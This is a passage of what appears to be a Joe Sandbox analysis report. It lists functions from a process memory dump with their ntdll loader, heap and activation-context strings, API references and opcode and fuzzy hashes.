                    • Instruction ID: 43496ab64b74bd7dc5f47626326a56ac6bbe7da8b62854e32e602a5d30552758
                    • Opcode Fuzzy Hash: 513d7ccc4076f1794837c02b67939466050a254305c31ccbc0d3a69a74850d24
                    • Instruction Fuzzy Hash: 8A31F5B1644756AFD310DF28C985E1B77D6EF95B2CF000568F9486B3A1E634ED04C7A2
                    Function 213B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 213B2DF0: LdrInitializeThunk.NTDLL ref: 213B2DFA
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0BA3
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0BB6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0D60
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0D74
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                    • String ID:
                    • API String ID: 1404860816-0
                    • Opcode ID: 527da5d2e04264a36a0bdb6a1e267059e735d45114ee09690ca9016a16a431a6
                    • Instruction ID: aa21fd6271093d51f4198bd9ab28b0be70574a37d62777b0fa2e0d387b6d1493
                    • Opcode Fuzzy Hash: 527da5d2e04264a36a0bdb6a1e267059e735d45114ee09690ca9016a16a431a6
                    • Instruction Fuzzy Hash: D2426D71900719DFDB21CF28C880B9AB7FABF05308F1445A9E99DDB641E770AA84CF61
                    Function 2137A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                    • API String ID: 0-379654539
                    • Opcode ID: 1357aec3bc51e38d26fec23784f6ac614ff2e24914268a861d493a25c0addb9f
                    • Instruction ID: 48aeb7fca32ab30b213f59a9138be79069fef7bdcfb1d4b60ebef06a436a1829
                    • Opcode Fuzzy Hash: 1357aec3bc51e38d26fec23784f6ac614ff2e24914268a861d493a25c0addb9f
                    • Instruction Fuzzy Hash: CBC18972108386CFD701CF58C840B5AB7FABF85718F04496EF9959B250E739CA4ACB52
                    Function 213A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                    Download Yara Rule
                    Strings
                    • minkernel\ntdll\ldrinit.c, xrefs: 213A8421
                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 213A855E
                    • LdrpInitializeProcess, xrefs: 213A8422
                    • @, xrefs: 213A8591
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-1918872054
                    • Opcode ID: e76a2e5ccb48af98517f59ef46070d96cd81e46f1e6ecb102fa1e331a16bb5a0
                    • Instruction ID: 3220a435d7f4e52509c962c7d9938ce2d08e2efd96d78d54499dc3a7226ea64f
                    • Opcode Fuzzy Hash: e76a2e5ccb48af98517f59ef46070d96cd81e46f1e6ecb102fa1e331a16bb5a0
                    • Instruction Fuzzy Hash: 1C917D71508345AFD721DF25CC44EABBAEEFF9474CF40096DFA8896151E734DA048BA2
                    Function 213A273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                    Download Yara Rule
                    Strings
                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 213E21D9, 213E22B1
                    • .Local, xrefs: 213A28D8
                    • SXS: %s() passed the empty activation context, xrefs: 213E21DE
                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 213E22B6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                    • API String ID: 0-1239276146
                    • Opcode ID: 2a9f9f58c4018b00157f69c321ea9f43844f8552e99dd326c9dd6896383cf946
                    • Instruction ID: 07fcc78dc4a75019e0f57f016c089921272966e2c417303cc371f61eab1cde63
                    • Opcode Fuzzy Hash: 2a9f9f58c4018b00157f69c321ea9f43844f8552e99dd326c9dd6896383cf946
                    • Instruction Fuzzy Hash: 6EA18D359012299FDB25CF64C888B99B7BAFF59758F2141EDE908AB351D7309E80CF90
                    Function 213A4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                    Download Yara Rule
                    Strings
                    • RtlDeactivateActivationContext, xrefs: 213E3425, 213E3432, 213E3451
                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 213E342A
                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 213E3456
                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 213E3437
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                    • API String ID: 0-1245972979
                    • Opcode ID: 7e5512cc5fbe3245188add9d1b0589a2e7c21ed1f57e6161fd5ec33e48ea05fd
                    • Instruction ID: d0b19bedd2893e1152abfe66ba89a563316b764378a73b1bf71837bfe5fed2a6
                    • Opcode Fuzzy Hash: 7e5512cc5fbe3245188add9d1b0589a2e7c21ed1f57e6161fd5ec33e48ea05fd
                    • Instruction Fuzzy Hash: 10612536600712AFD7128F18C885F1AB7EBEF91B68F14851DEC59AB340D734E901CB91
                    Function 213764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                    Download Yara Rule
                    Strings
                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 213D0FE5
                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 213D1028
                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 213D106B
                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 213D10AE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                    • API String ID: 0-1468400865
                    • Opcode ID: 4c3fb070b6206d6586f173108d38e7000b847186fe1e97da3b67b6a000fc627a
                    • Instruction ID: 45d9cad249b877d7c3003f09a09f0dd675ba19f361a9622490cde99925cb5a8f
                    • Opcode Fuzzy Hash: 4c3fb070b6206d6586f173108d38e7000b847186fe1e97da3b67b6a000fc627a
                    • Instruction Fuzzy Hash: 4571BFB2904345AFDB11DF18C884F8B7FAEAF55768F000469F9488B246D738D689DBD2
                    Function 213A4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                    Download Yara Rule
                    Strings
                    • minkernel\ntdll\ldrsnap.c, xrefs: 213E3640, 213E366C
                    • LdrpFindDllActivationContext, xrefs: 213E3636, 213E3662
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 213E365C
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 213E362F
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: 2c4780d358dcb4b1d214ec9e88d0b2780c07561bc62adfd946dc89bbf7924bfd
                    • Instruction ID: 1aef35acdfd8f12723120afe547df408dc8bd5a11498ecb461e691889f987421
                    • Opcode Fuzzy Hash: 2c4780d358dcb4b1d214ec9e88d0b2780c07561bc62adfd946dc89bbf7924bfd
                    • Instruction Fuzzy Hash: 2D310B72900255AEEB129B14C888F5677EBFB0377CF0A412EDD0867663DBA4DD8087D5
                    Function 2139245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                    Download Yara Rule
                    Strings
                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 213DA992
                    • TG4!, xrefs: 21392462
                    • minkernel\ntdll\ldrinit.c, xrefs: 213DA9A2
                    • LdrpDynamicShimModule, xrefs: 213DA998
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG4!$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-4157384740
                    • Opcode ID: 5a512862fa1312be989e0c083b5e4a9edf1a13d32b288a7ce09f621a04bc2ae4
                    • Instruction ID: 0a37ddc4a4f6329193038e38b2fe67d2909c407a82b895ea421cbe3c1b2ef8e4
                    • Opcode Fuzzy Hash: 5a512862fa1312be989e0c083b5e4a9edf1a13d32b288a7ce09f621a04bc2ae4
                    • Instruction Fuzzy Hash: AB317CB7640286EFE7118F69C980E9A77FBFB85B0CF11005DF9196B261CB749981CB80
                    Function 213829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                    Download Yara Rule
                    Strings
                    • HEAP: , xrefs: 21383264
                    • HEAP[%wZ]: , xrefs: 21383255
                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2138327D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                    • API String ID: 0-617086771
                    • Opcode ID: eb6781fd774acf2a8027bf87f5bb04ca1f6e08546c6184be489c9a9e7b461be1
                    • Instruction ID: e717e5a5357b5edf771ed51b2833b789a994230d2044dac2b7d892a046a4d0ec
                    • Opcode Fuzzy Hash: eb6781fd774acf2a8027bf87f5bb04ca1f6e08546c6184be489c9a9e7b461be1
                    • Instruction Fuzzy Hash: 9092BC70A042499FEB15CF68C440BAEBBF6FF49308F1580ADE85AAB391D735A945CF50
                    Function 21380770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-4253913091
                    • Opcode ID: 3f7ae0bf5d721a2e510585589350f2674860396be3d6117386620351111ff7e5
                    • Instruction ID: 32d849bac6bab482b7753d6220c39171c114d74512879bfd5cad07497e95caf9
                    • Opcode Fuzzy Hash: 3f7ae0bf5d721a2e510585589350f2674860396be3d6117386620351111ff7e5
                    • Instruction Fuzzy Hash: 95F19F32A00606DFEB15CF68C490F6ABBFAFF45708F114269E5169B391D734EA81CB90
                    Function 21396962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: $@
                    • API String ID: 0-1077428164
                    • Opcode ID: 90b5717c4afe4dea53675e8e0feabda14dd445d41be176f6b565e89420473278
                    • Instruction ID: 40543037a8029e220903e796ef7c70ac79bd10834152cefa1765b9fd41c5cf14
                    • Opcode Fuzzy Hash: 90b5717c4afe4dea53675e8e0feabda14dd445d41be176f6b565e89420473278
                    • Instruction Fuzzy Hash: 64C290726183459FE725CF24C841B9BBBEABF89758F04892DF989C7241D734D904CB92
                    Function 2136A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: FilterFullPath$UseFilter$\??\
                    • API String ID: 0-2779062949
                    • Opcode ID: 7f0ece65410e071833cab2f89422a462f9779a50e9284df93713cc7aaf8588a8
                    • Instruction ID: 374a51fc100d95f3aea9464be8d809815e0d5a44c685ad9fe217d60d505f0319
                    • Opcode Fuzzy Hash: 7f0ece65410e071833cab2f89422a462f9779a50e9284df93713cc7aaf8588a8
                    • Instruction Fuzzy Hash: 74A16B7191122D9BDB21DF24CC88B9AB7BAFF45B18F1041E9E908A7250E7359F84CF54
                    Function 21390BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                    Download Yara Rule
                    Strings
                    • Failed to allocated memory for shimmed module list, xrefs: 213DA10F
                    • minkernel\ntdll\ldrinit.c, xrefs: 213DA121
                    • LdrpCheckModule, xrefs: 213DA117
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-161242083
                    • Opcode ID: e99e4c2997a77477edb7d9ecf2d21d5cf4886f836c2759e2f4f1153b528fd3f9
                    • Instruction ID: 24433b22f54606d175f3c4d81d866e5a2dd94f22da06d49f5c76d20a1a783b43
                    • Opcode Fuzzy Hash: e99e4c2997a77477edb7d9ecf2d21d5cf4886f836c2759e2f4f1153b528fd3f9
                    • Instruction Fuzzy Hash: 6C71B0B2A00245DFDF05DF68C980AAEB7FAFB4470CF14446DD516AB251E738AA41CB90
                    Function 21380A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-1334570610
                    • Opcode ID: d62eb83dc99c085692c3cd2f8619586b4a8796bef7d39b51245e7393b7f5d995
                    • Instruction ID: f3a24d4b54ea7e2b625a10c75cb852e0a6eb2163d3a5eef8b1d17cf549208509
                    • Opcode Fuzzy Hash: d62eb83dc99c085692c3cd2f8619586b4a8796bef7d39b51245e7393b7f5d995
                    • Instruction Fuzzy Hash: 3761EF726003469FE719CF28C480B5ABBF6FF45708F11866DE4598F296C770E981CB90
                    Function 213AC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                    Download Yara Rule
                    Strings
                    • LdrpInitializePerUserWindowsDirectory, xrefs: 213E82DE
                    • minkernel\ntdll\ldrinit.c, xrefs: 213E82E8
                    • Failed to reallocate the system dirs string !, xrefs: 213E82D7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-1783798831
                    • Opcode ID: bad33ee87f15b8a4b9a2abedda58b1bdd38a90de74622ac446704cbd491ed51c
                    • Instruction ID: 336316aefb732540304bd3cc4df66f81d4c6c54975fb9c0e6c511bab52b530b6
                    • Opcode Fuzzy Hash: bad33ee87f15b8a4b9a2abedda58b1bdd38a90de74622ac446704cbd491ed51c
                    • Instruction Fuzzy Hash: 5D41EEB1584355AFC711DF68C984B4B7BEAEF49B5CF00492AF94CA3261EB79D800CB91
                    Function 2142C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    • PreferredUILanguages, xrefs: 2142C212
                    • @, xrefs: 2142C1F1
                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2142C1C5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                    • API String ID: 0-2968386058
                    • Opcode ID: 539ea54e244284e854c5bb36a6d9392c7cefc5a18508eb6a42753dc6ba3f4126
                    • Instruction ID: 4c481eee38782ffc19a4acb637eda78c21c6dfd845c3e8c8162e47a10a373290
                    • Opcode Fuzzy Hash: 539ea54e244284e854c5bb36a6d9392c7cefc5a18508eb6a42753dc6ba3f4126
                    • Instruction Fuzzy Hash: 92415072E0060DAFDB01CBD9CC81FDEBBBDAB16714F10416AE609A7240DB759B858B60
                    Function 21404144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                    • API String ID: 0-1373925480
                    • Opcode ID: 7d74296e199169768096905b33bab880757fa83a6d56d1f5a024a03bc417d7e4
                    • Instruction ID: 2a82767a5d707b0bd7932e4ff8572ee6e22ba9542762e6cb0f4d2c6d51c3482d
                    • Opcode Fuzzy Hash: 7d74296e199169768096905b33bab880757fa83a6d56d1f5a024a03bc417d7e4
                    • Instruction Fuzzy Hash: 1B410432A042498FEB1ACBEAC844B9DBBB9FF56384F19046DD908EF791D7349901CB51
                    Function 213F4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                    Download Yara Rule
                    Strings
                    • minkernel\ntdll\ldrredirect.c, xrefs: 213F4899
                    • LdrpCheckRedirection, xrefs: 213F488F
                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 213F4888
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                    • API String ID: 0-3154609507
                    • Opcode ID: 581ef6a674daf3a5a83016648d4dd23b8df9f135918b0e8561c995fdcc357797
                    • Instruction ID: e527b57d157c7dfd3712b9b3d1488d94fac30a5052adf39e09d1967eecb50f16
                    • Opcode Fuzzy Hash: 581ef6a674daf3a5a83016648d4dd23b8df9f135918b0e8561c995fdcc357797
                    • Instruction Fuzzy Hash: 8841CF32A042919FCB11CE68D840E167FEABF8A668F01056DED5897325D732E800CB91
                    Function 2137A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                    Download Yara Rule
                    Strings
                    • RtlpResUltimateFallbackInfo Exit, xrefs: 2137A309
                    • PS4!, xrefs: 2137A348
                    • RtlpResUltimateFallbackInfo Enter, xrefs: 2137A2FB
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: PS4!$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                    • API String ID: 0-1371353809
                    • Opcode ID: c4541e01439a9de7328e12a9411665c2a4773fe9d915fcabbf798d8f1577f463
                    • Instruction ID: da5adde672679bf5d131838b3a41ad777ae82ff714ee85301b87a339d6b3df1b
                    • Opcode Fuzzy Hash: c4541e01439a9de7328e12a9411665c2a4773fe9d915fcabbf798d8f1577f463
                    • Instruction Fuzzy Hash: 6341B432A04649DFEB05CF69C880B5E7BBAFF45708F1441A9E910DB351E3B9DA41CB50
                    Function 21380BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
